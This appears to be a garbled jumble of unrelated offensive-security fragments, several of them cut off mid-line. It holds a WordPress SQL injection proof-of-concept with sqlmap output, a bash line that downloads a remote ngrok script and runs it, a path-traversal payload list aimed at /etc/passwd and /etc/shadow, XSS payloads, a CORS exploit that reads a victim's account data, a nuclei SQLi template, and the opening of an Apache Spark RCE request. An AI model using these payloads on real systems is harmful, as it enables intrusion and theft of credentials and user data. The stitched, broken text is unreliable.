poc:
GET /wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***&taction=edit HTTP/1.1
sqlmap result:
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)
#!/bin/bash
wget -O ng.sh https://github.com/kmille36/Docker-Ubuntu-Desktop-NoMachine/raw/main/ngrok.sh > /dev/null 2>&1
chmod +x ng.sh
./ng.sh
function goto
{
label=$1
cd
```zshrc
#▄███████▄ ▄████████ ▄█ █▄ ▄████████ ▄████████
#██▀ ▄██ ███ ███ ███ ███ ███ ███ ███ ███
# ▄███▀ ███ █▀ ███ ███ ███ ███ ███ █▀
#▀█▀▄███▀▄▄ ███ ▄███▄▄▄▄███▄▄ ▄███▄▄▄▄██▀ ███
# ▄███▀ ▀ ▀███████████ ▀▀███▀▀▀▀███▀ ▀▀███▀▀▀▀▀ ███
#▄███▀ ███ ███ ███ ▀███████████ ███ █▄
#███▄ ▄█ ▄█ ███ ███ ███ ███ ███ ███ ███
#▀████████▀ ▄████████▀ ███ █▀ ███ ███ ████████▀
# ███ ███
```
/etc/master.passwd
/master.passwd
/etc/passwd
/etc/shadow%00
/etc/passwd
/etc/passwd%00
../etc/passwd
../etc/passwd%00
../../etc/passwd
../../etc/passwd%00
<script>
x = '<!--<script>'/*</script>-->*/;alert(1)
| layout | title |
|---|---|
| post | xss cheat sheet |
# xss-cheat-sheet
# Basics Xss
HTML Context - Simple Tag Injection
Dorks are cool
Dorks for Google, Shodan and BinaryEdge
Only for use on bug bounty programs or in coordination with a legal security assessment.
I am in no way responsible for the usage of these search queries.
Be responsible thanks - https://www.bugcrowd.com/resource/what-is-responsible-disclosure/
This repository is "under construction" feel free to make pull requests :-)
<html>
<body>
<button type='button' onclick='cors()'>CORS</button>
<p id='demo'></p>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
var a = this.responseText; // Sensitive data from niche.co about user account
id: SQLInjection_ERROR
info:
  name: SQLINJECTION Detection
  author: 0x240x23elu & OFJAAAH
  severity: High
requests:
  - method: GET
Apache Spark RCE
POST /v1/submissions/create HTTP/1.1
Host: ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 619
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip
{